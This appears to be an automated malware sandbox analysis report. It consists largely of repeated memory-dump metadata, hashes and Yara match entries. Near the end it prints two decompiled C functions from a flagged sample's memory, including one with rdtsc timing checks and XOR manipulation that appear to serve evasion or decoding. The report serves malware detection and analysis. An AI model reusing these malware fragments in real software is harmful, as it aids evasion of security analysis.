                                                                                                                                                  • Associated: 00000006.00000002.2220294994.0000000002600000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220301799.0000000002610000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220310809.0000000002614000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220316099.0000000002617000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220322466.0000000002620000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220373772.0000000002680000.00000040.00000001.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                                                                                                                  • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                                                                                                                                  • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                                                                                                                  • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 0252FAE8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2220190974.0000000002520000.00000040.00000001.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2220178466.0000000002510000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220294994.0000000002600000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220301799.0000000002610000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220310809.0000000002614000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220316099.0000000002617000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220322466.0000000002620000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220373772.0000000002680000.00000040.00000001.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                                                                                                  • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                                                                                                                  • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                                                                                                  • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 0252FB68, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2220190974.0000000002520000.00000040.00000001.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2220178466.0000000002510000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220294994.0000000002600000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220301799.0000000002610000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220310809.0000000002614000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220316099.0000000002617000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220322466.0000000002620000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220373772.0000000002680000.00000040.00000001.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                                                                                                  • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                                                                                                                  • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                                                                                                  • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 0252FBB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2220190974.0000000002520000.00000040.00000001.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2220178466.0000000002510000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220294994.0000000002600000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220301799.0000000002610000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220310809.0000000002614000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220316099.0000000002617000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220322466.0000000002620000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220373772.0000000002680000.00000040.00000001.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                                                                                                                  • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                                                                                                                                  • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                                                                                                                  • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 0252F900, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2220190974.0000000002520000.00000040.00000001.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2220178466.0000000002510000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220294994.0000000002600000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220301799.0000000002610000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220310809.0000000002614000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220316099.0000000002617000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220322466.0000000002620000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220373772.0000000002680000.00000040.00000001.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                                                                                                                  • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                                                                                                                                  • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                                                                                                                  • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 0252F9F0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2220190974.0000000002520000.00000040.00000001.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2220178466.0000000002510000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220294994.0000000002600000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220301799.0000000002610000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220310809.0000000002614000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220316099.0000000002617000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220322466.0000000002620000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220373772.0000000002680000.00000040.00000001.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                                                                                                  • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                                                                                                                  • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                                                                                                  • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 0252FED0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2220190974.0000000002520000.00000040.00000001.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2220178466.0000000002510000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220294994.0000000002600000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220301799.0000000002610000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220310809.0000000002614000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220316099.0000000002617000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220322466.0000000002620000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220373772.0000000002680000.00000040.00000001.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                                                                                                                  • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                                                                                                                                  • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                                                                                                                  • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 0252FEA0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2220190974.0000000002520000.00000040.00000001.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2220178466.0000000002510000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220294994.0000000002600000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220301799.0000000002610000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220310809.0000000002614000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220316099.0000000002617000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220322466.0000000002620000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220373772.0000000002680000.00000040.00000001.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                                                                                                                  • Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
                                                                                                                                                  • Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                                                                                                                  • Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 0252FFB4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2220190974.0000000002520000.00000040.00000001.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2220178466.0000000002510000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220294994.0000000002600000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220301799.0000000002610000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220310809.0000000002614000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220316099.0000000002617000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220322466.0000000002620000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220373772.0000000002680000.00000040.00000001.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                                                                                                                  • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                                                                                                                                  • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                                                                                                                  • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 0252FC60, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2220190974.0000000002520000.00000040.00000001.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2220178466.0000000002510000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220294994.0000000002600000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220301799.0000000002610000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220310809.0000000002614000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220316099.0000000002617000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220322466.0000000002620000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220373772.0000000002680000.00000040.00000001.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                                                                                                                  • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                                                                                                                                  • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                                                                                                                  • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 0252FC90, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2220190974.0000000002520000.00000040.00000001.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2220178466.0000000002510000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220294994.0000000002600000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220301799.0000000002610000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220310809.0000000002614000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220316099.0000000002617000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220322466.0000000002620000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220373772.0000000002680000.00000040.00000001.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                                                                                                                  • Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
                                                                                                                                                  • Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                                                                                                                  • Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 0252FDC0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2220190974.0000000002520000.00000040.00000001.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2220178466.0000000002510000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220294994.0000000002600000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220301799.0000000002610000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220310809.0000000002614000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220316099.0000000002617000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220322466.0000000002620000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220373772.0000000002680000.00000040.00000001.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                                                                                                                  • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                                                                                                                                  • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                                                                                                                  • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 0252FD8C, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2220190974.0000000002520000.00000040.00000001.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2220178466.0000000002510000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220294994.0000000002600000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220301799.0000000002610000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220310809.0000000002614000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220316099.0000000002617000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220322466.0000000002620000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220373772.0000000002680000.00000040.00000001.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                                                                                                                  • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                                                                                                                                  • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                                                                                                                  • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 00409A80, Relevance: .1, Instructions: 92COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 93%
                                                                                                                                                  			E00409A80(void* __ecx, void* __edx, intOrPtr _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t39;
				void* _t52;
				intOrPtr _t54;
				void* _t55;
				void* _t56;
				void* _t57;
				void* _t58;

				_t54 = _a4;
				_t39 = 0; // executed
				_t24 = E00407E80(__ecx, __edx, _t54,  &_v24); // executed
				_t56 = _t55 + 8;
				if(_t24 != 0) {
					E00408090( &_v24,  &_v840);
					_t57 = _t56 + 8;
					do {
						E0041B800( &_v284, 0x104);
						E0041BE70( &_v284,  &_v804);
						_t58 = _t57 + 0x10;
						_t52 = 0x4f;
						while(1) {
							_t31 = E00414DB0(E00414D50(_t54, _t52),  &_v284);
							_t58 = _t58 + 0x10;
							if(_t31 != 0) {
								break;
							}
							_t52 = _t52 + 1;
							if(_t52 <= 0x62) {
								continue;
							} else {
							}
							goto L8;
						}
						_t9 = _t54 + 0x14; // 0xffffe055
						 *(_t54 + 0x474) =  *(_t54 + 0x474) ^  *_t9;
						_t39 = 1;
						L8:
						_t33 = E004080C0( &_v24,  &_v840);
						_t57 = _t58 + 8;
					} while (_t33 != 0 && _t39 == 0);
					_t34 = E00408140(_t54,  &_v24); // executed
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						 *((intOrPtr*)(_t54 + 0x55c)) =  *((intOrPtr*)(_t54 + 0x55c)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t54 + 0x31)) =  *((intOrPtr*)(_t54 + 0x31)) + _t39;
					_t20 = _t54 + 0x31; // 0x5608758b
					 *((intOrPtr*)(_t54 + 0x32)) =  *((intOrPtr*)(_t54 + 0x32)) +  *_t20 + 1;
					return 1;
				} else {
					return _t24;
				}
			}



















                                                                                                                                                  0x00409a8b
                                                                                                                                                  0x00409a93
                                                                                                                                                  0x00409a95
                                                                                                                                                  0x00409a9a
                                                                                                                                                  0x00409a9f
                                                                                                                                                  0x00409ab2
                                                                                                                                                  0x00409ab7
                                                                                                                                                  0x00409ac0
                                                                                                                                                  0x00409acc
                                                                                                                                                  0x00409adf
                                                                                                                                                  0x00409ae4
                                                                                                                                                  0x00409ae7
                                                                                                                                                  0x00409af0
                                                                                                                                                  0x00409b02
                                                                                                                                                  0x00409b07
                                                                                                                                                  0x00409b0c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00409b0e
                                                                                                                                                  0x00409b12
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00409b14
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00409b12
                                                                                                                                                  0x00409b16
                                                                                                                                                  0x00409b19
                                                                                                                                                  0x00409b1f
                                                                                                                                                  0x00409b21
                                                                                                                                                  0x00409b2c
                                                                                                                                                  0x00409b31
                                                                                                                                                  0x00409b34
                                                                                                                                                  0x00409b41
                                                                                                                                                  0x00409b4c
                                                                                                                                                  0x00409b4e
                                                                                                                                                  0x00409b54
                                                                                                                                                  0x00409b58
                                                                                                                                                  0x00409b5b
                                                                                                                                                  0x00409b5b
                                                                                                                                                  0x00409b62
                                                                                                                                                  0x00409b65
                                                                                                                                                  0x00409b6a
                                                                                                                                                  0x00409b77
                                                                                                                                                  0x00409aa6
                                                                                                                                                  0x00409aa6
                                                                                                                                                  0x00409aa6

                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2216844899.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: ea422489a25dcefea3ed0f1b9a3fefea2ebcd7ffde6029fed25eb79b3bdcb825
                                                                                                                                                  • Instruction ID: 31b1220a7bfbfd16f43a3644c83f2c17606f0388dd956b3420c92d1797c928f5
                                                                                                                                                  • Opcode Fuzzy Hash: ea422489a25dcefea3ed0f1b9a3fefea2ebcd7ffde6029fed25eb79b3bdcb825
                                                                                                                                                  • Instruction Fuzzy Hash: 202137B2D4020857CB25DA64AD42AEF73BCAB54304F04007FE949A7182F63CBE49CBA5
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 0041A020, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E0041A020(intOrPtr _a4, void* _a8, long _a12, char _a16) {
				void* _t10;
				void* _t15;

				E0041A950(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t4 =  &_a16; // 0x414c6f
				_t10 = RtlAllocateHeap(_a8, _a12,  *_t4); // executed
				return _t10;
			}





                                                                                                                                                  0x0041a037
                                                                                                                                                  0x0041a03c
                                                                                                                                                  0x0041a04d
                                                                                                                                                  0x0041a051

                                                                                                                                                  APIs
                                                                                                                                                  • RtlAllocateHeap.NTDLL(004144F6,?,oLA,00414C6F,?,004144F6,?,?,?,?,?,00000000,00409CC3,?), ref: 0041A04D
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2216844899.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                                  • String ID: oLA
                                                                                                                                                  • API String ID: 1279760036-3789366272
                                                                                                                                                  • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                                                                  • Instruction ID: 3e9cccf5f91448adbf19cee7c08a6922c38dacc77a606dc9f5f43a2a80c29887
                                                                                                                                                  • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                                                                  • Instruction Fuzzy Hash: 4BE012B1210208ABDB14EF99CC41EA777ACAF88664F118559BA185B242C630F9108AB0
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

